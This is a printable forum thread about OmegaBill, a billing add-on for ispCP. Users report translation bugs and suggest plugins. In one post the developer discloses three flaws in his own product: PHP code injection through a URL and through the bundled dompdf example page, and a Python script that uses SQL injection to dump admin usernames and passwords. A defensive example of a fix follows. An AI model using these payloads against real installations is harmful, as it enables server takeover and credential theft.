[DEV] OmegaBill - Printable Version

+- ispCP - Board - Support (http://www.isp-control.net/forum)
+-- Forum: ispCP Omega Contributions Area (/forum-40.html)
+--- Forum: Enhancements (/forum-43.html)
+--- Thread: [DEV] OmegaBill (/thread-6793.html)

RE: [DEV] OmegaBill - platix - 03-18-2011 09:51 PM

Hello all!!!

Here is my contribution.

Spanish translation

I found some bugs in translations,

PHP Code:
login.php
index.php
154 to 160: "per page" not translated
paid or unpaid states
settings.php
308: "portrait" not translated
309: "landscape" not translated
"Search" on all pages not translated
"Print this page" on all pages not translated
"Sumit" buttons on all pages not translated

Good work and thanks for the system

regards!

RE: [DEV] OmegaBill - max.samael - 03-18-2011 11:59 PM

Slovak translation 100%

I add new line:

    //coding
    $general['charset']='UTF-8';

Coding for head

RE: [DEV] OmegaBill - max.samael - 03-19-2011 03:17 AM

Can I participate with ISPvoice system?

RE: [DEV] OmegaBill - shaggy - 03-27-2011 09:07 AM

Hey oddyutza,

How is it all going, have you managed to finish it yet? I really would like to drop my invoicing program and have it all working in one system.

Need help with bug testing? Post me a link to your current version and I will test it.

RE: [DEV] OmegaBill - oddyutza - 04-16-2011 02:56 AM

hello all,

it seems that OmegaBill has some security problems

All Tested On...............Windows Vista + XAMPP

Vulnerability 1:

    http://localhost/OmegaBill_v1.0_Build6/clients/download_invoice.php?invoiceid=<?php system("calc.exe"); ?>

NOTE: client panel is not ready

Vulnerability 2:

    POST http://localhost/OmegaBill_v1.0_Build6/plugins/dompdf/www/examples.php HTTP/1.1
    Host: localhost
    Connection: keep-alive
    User-Agent: x
    Content-Length: 93
    Cache-Control: max-age=0
    Origin: null
    Content-Type: multipart/form-data; boundary=----x
    Accept: text/html
    Accept-Language: en-US,en;q=0.8
    Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

    ------x
    Content-Disposition: form-data; name="html"

    <?php system("calc.exe"); ?>
    ------x--

Vulnerability 3:

    import socket

    host = 'localhost'
    path = '/omegabill_v1.0_build6'
    port = 80

    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.connect((host, port))
    s.settimeout(8)

    s.send('POST ' + path + '/generate_report.php HTTP/1.1\r\n'
           'Host: localhost\r\n'
           'Connection: keep-alive\r\n'
           'User-Agent: x\r\n'
           'Content-Length: 239\r\n'
           'Cache-Control: max-age=0\r\n'
           'Origin: null\r\n'
           'Content-Type: multipart/form-data; boundary=----x\r\n'
           'Accept: text/html\r\n'
           'Accept-Language: en-US,en;q=0.8\r\n'
           'Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3\r\n'
           '\r\n'
           '------x\r\n'
           'Content-Disposition: form-data; name="startdate"\r\n'
           '\r\n'
           '\'OR 1 = 1 UNION ALL SELECT CONCAT(username,\':\',password),0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0 FROM admins;#\r\n'
           '------x\r\n'
           'Content-Disposition: form-data; name="enddate"\r\n'
           '\r\n'
           '\r\n'
           '------x--\r\n'
           '\r\n')

    print s.recv(8192)

    # An authentication bypass/SQL injection vulnerability in OmegaBill v1.0
    # Build 6 can be exploited to retrieve a list of usernames and passwords.

I will make some changes to the code ASAP. Also, some bigger updates are planned with the new release.

@shaggy: can you please test if the holes are replicated on Unix OS?

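An added example, not part of the thread and not OmegaBill's code: one way to close the `startdate`/`enddate` injection reported as Vulnerability 3 above is to parse both fields as dates and pass them to the query only as bound parameters. The `invoices` table, the function names and the sample rows are assumptions, and SQLite stands in for the application's database.

```python
import sqlite3
from datetime import date, datetime

def make_db():
    # Constructed schema and rows; the thread does not show OmegaBill's tables.
    db = sqlite3.connect(":memory:")
    db.executescript("""
        CREATE TABLE invoices (id INTEGER PRIMARY KEY, client TEXT,
                               amount REAL, created TEXT);
        CREATE TABLE admins (username TEXT, password TEXT);
        INSERT INTO invoices (client, amount, created) VALUES
            ('acme', 10.0, '2011-03-01'), ('acme', 25.5, '2011-04-10');
        INSERT INTO admins VALUES ('admin', 'constructed-hash');
    """)
    return db

def parse_report_date(raw, default):
    """Return a date for YYYY-MM-DD input; empty input yields the default."""
    raw = (raw or "").strip()
    if not raw:
        return default
    try:
        return datetime.strptime(raw, "%Y-%m-%d").date()
    except ValueError:
        raise ValueError("date must be YYYY-MM-DD") from None

def report_rows(db, startdate, enddate):
    """Hypothetical report query: validated dates, bound as parameters."""
    start = parse_report_date(startdate, date.min)
    end = parse_report_date(enddate, date.max)
    if start > end:
        raise ValueError("startdate is after enddate")
    # The SQL text is constant; user input only ever travels as bound values.
    cur = db.execute(
        "SELECT id, client, amount, created FROM invoices "
        "WHERE created BETWEEN ? AND ? ORDER BY created",
        (start.isoformat(), end.isoformat()),
    )
    return cur.fetchall()

if __name__ == "__main__":
    db = make_db()
    print(report_rows(db, "2011-04-01", "2011-04-30"))
    try:
        # Same shape as the startdate value in the post, shortened.
        report_rows(db, "'OR 1 = 1 UNION ALL SELECT 0 FROM admins;#", "")
    except ValueError as exc:
        print("rejected:", exc)
```

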
RE: [DEV] OmegaBill - shaggy - 04-18-2011 12:00 AM

I have just got my server back online after a major network change, and the server then deciding it didn't want to work with me, so I am now using Debian. I haven't got Omega bill installed as yet but I will look into it. I am currently setting up a testing server so I can test things BEFORE putting it on my production server, as I think that was one of my downfalls.

Will post back when it's running.

RE: [DEV] OmegaBill - anarking - 06-15-2011 02:56 AM

Hi guys, any movement with this?

I can set up a clean ispCP install on a virtual machine with a dedicated IP and load OmegaBill, even give you guys SSH access if you'd like so testing can be done anytime.

Let me know, I would love nothing more than for some ordering/billing system to be complete!

RE: [DEV] OmegaBill - max.samael - 07-08-2011 05:38 AM

Hello,

any idea with merging ispvoice 1.20 project and omegabill? I will prepare plugin, that can work with omegabill. If someone is interested, please, contact me.